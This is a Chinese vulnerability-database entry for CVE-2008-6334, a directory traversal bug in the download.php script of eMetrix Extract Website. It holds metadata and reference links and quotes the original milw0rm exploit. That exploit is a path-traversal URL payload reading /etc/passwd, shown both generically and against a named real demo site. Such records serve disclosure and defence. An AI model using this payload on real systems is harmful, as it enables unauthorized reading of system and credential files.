https://www.exploit-db.com/exploits/7525
https://cxsecurity.com/issue/WLB-2009030099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-651
eMetrix Extract Website 'download.php'目录遍历漏洞






漏洞ID | 1117091 | 漏洞类型 | 路径遍历 |
发布时间 | 2008-12-19 | 更新时间 | 2009-03-02 |
![]() |
CVE-2008-6334 | ![]() |
CNNVD-200902-651 |
漏洞平台 | PHP | CVSS评分 | 7.8 |
|漏洞来源
|漏洞详情
eMetrixExtractWebsite的download.php中存在目录遍历漏洞。远程攻击者可以借助filename参数中的一个..,读取任意文件。
|漏洞EXP
Extract Website (download.php filename) Local File Include
# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=74332316
# demo : http://www.rightscripts.com/extractwebsite/
# about : This tool help you extract web data include URL links,
domain names, contact emails, keywords, meta tags, page titles
or text from other website.
You can extract these data from a list of website links or from simple text.
# Exploit
[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd
# Example
[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd
==================================
Greetz : www.hackteach.org members , AnGeL25dZ
# milw0rm.com [2008-12-19]
|参考资料
来源:XF
名称:extract-download-file-include(47517)
链接:http://xforce.iss.net/xforce/xfdb/47517
来源:BID
名称:32936
链接:http://www.securityfocus.com/bid/32936
来源:MILW0RM
名称:7525
链接:http://www.milw0rm.com/exploits/7525
来源:SECUNIA
名称:33255
链接:http://secunia.com/advisories/33255
检索漏洞
开始时间
结束时间